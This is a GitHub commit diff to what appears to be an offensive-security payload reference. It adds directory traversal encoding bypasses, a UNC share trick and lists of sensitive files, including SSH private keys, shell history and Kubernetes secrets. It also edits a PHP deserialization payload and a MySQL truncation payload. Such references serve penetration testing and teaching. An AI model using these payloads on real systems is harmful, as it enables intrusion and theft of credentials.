Skip to content
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Commit f656486

Browse files
committedJul 5, 2019
Fix typo in PHP Object injection
1 parent 13ba72f commit f656486

File tree

3 files changed

+36
-15
lines changed

3 files changed

+36
-15
lines changed
 

‎Directory Traversal/README.md

Lines changed: 29 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,14 @@
66

77
* [Tools](#tools)
88
* [Basic exploitation](#basic-exploitation)
9+
* [16 bits Unicode encoding](#)
10+
* [UTF-8 Unicode encoding](#)
11+
* [Bypass "../" replaced by ""](#)
12+
* [Double URL encoding](#)
13+
* [UNC Bypass](#unc-bypass)
914
* [Path Traversal](#path-traversal)
15+
* [Interesting Linux files](#)
16+
* [Interesting Windows files](#)
1017

1118
## Tools
1219

@@ -31,41 +38,50 @@ We can use the `..` characters to access the parent directory, the following str
3138
%uff0e%uff0e%u2216
3239
```
3340

34-
16 bit Unicode encoding
41+
### 16 bits Unicode encoding
3542

3643
```powershell
3744
. = %u002e
3845
/ = %u2215
3946
\ = %u2216
4047
```
4148

42-
UTF-8 Unicode encoding
49+
### UTF-8 Unicode encoding
4350

4451
```powershell
4552
. = %c0%2e, %e0%40%ae, %c0ae
4653
/ = %c0%af, %e0%80%af, %c0%2f
4754
\ = %c0%5c, %c0%80%5c
4855
```
4956

57+
### Bypass "../" replaced by ""
5058
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
5159

5260
```powershell
5361
..././
5462
...\.\
5563
```
5664

57-
Double URL encoding
65+
### Double URL encoding
5866

5967
```powershell
6068
. = %252e
6169
/ = %252f
6270
\ = %255c
6371
```
6472

73+
### UNC Bypass
74+
75+
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
76+
77+
```powershell
78+
\\localhost\c$\windows\win.ini
79+
```
80+
6581

6682
## Path Traversal
6783

68-
Linux - Interesting files to check out :
84+
### Interesting Linux files
6985

7086
```powershell
7187
/etc/issue
@@ -85,9 +101,16 @@ Linux - Interesting files to check out :
85101
/proc/net/route
86102
/proc/net/tcp
87103
/proc/net/udp
104+
/proc/self/cwd/index.php
105+
/proc/self/cwd/main.py
106+
/home/$USER/.bash_history
107+
/home/$USER/.ssh/id_rsa
108+
/var/run/secrets/kubernetes.io/serviceaccount
88109
```
89110

90-
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
111+
### Interesting Windows files
112+
113+
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
91114

92115
```powershell
93116
c:/boot.ini
@@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
127150
/var/log/mail
128151
```
129152

130-
Other easy win files.
131-
132-
```powershell
133-
/proc/self/cwd/index.php
134-
/home/$USER/.bash_history
135-
/var/run/secrets/kubernetes.io/serviceaccount
136-
```
137-
138-
139153
## References
140154

141155
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
156+
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)

‎Insecure Deserialization/PHP.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -99,7 +99,7 @@ if($obj) {
9999
Payload:
100100

101101
```php
102-
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
102+
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
103103
```
104104

105105
## Others exploits

‎SQL Injection/MySQL Injection.md

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
263263

264264
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
265265

266+
```sql
267+
`username` varchar(20) not null
268+
```
269+
270+
Payload: `username = "admin a"`
271+
266272
## MYSQL UDF command execution
267273

268274
First you need to check if the UDF are installed on the server.

0 commit comments

Comments
 (0)
Please sign in to comment.